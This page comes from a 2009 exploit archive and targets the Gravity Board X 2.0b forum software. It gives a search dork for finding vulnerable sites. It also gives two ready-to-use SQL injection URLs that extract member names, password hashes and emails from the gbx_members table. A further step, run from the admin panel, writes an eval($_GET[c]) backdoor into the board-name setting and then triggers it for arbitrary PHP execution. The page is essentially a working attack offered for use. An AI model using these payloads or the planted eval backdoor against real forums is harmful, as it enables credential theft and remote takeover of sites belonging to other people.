[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gravity Board X 2.0b SQL Injection / Post Auth Code Execution
# Published : 2009-04-03
# Author : brain[pillow]
# Previous Title : Family Connections <= 1.8.2 Remote Shell Upload Exploit
# Next Title : AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
================================================================================
Found : brain[pillow]
Dork : "Powered By Gravity Board X v2.0 BETA"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Mail : brainpillow@gmail.com
================================================================================
SQL-injections:
/index.php?action=viewprofile&member_id=slider-loleg'+union+select+concat_ws(char(58),displayname,pw,email)+from+gbx_members+where+1='1
/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1
================================================================================
Code exec (in admin panel):
Go: /index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: /index.php?ok=phpinfo();
================================================================================
# www.Syue.com [2009-04-03]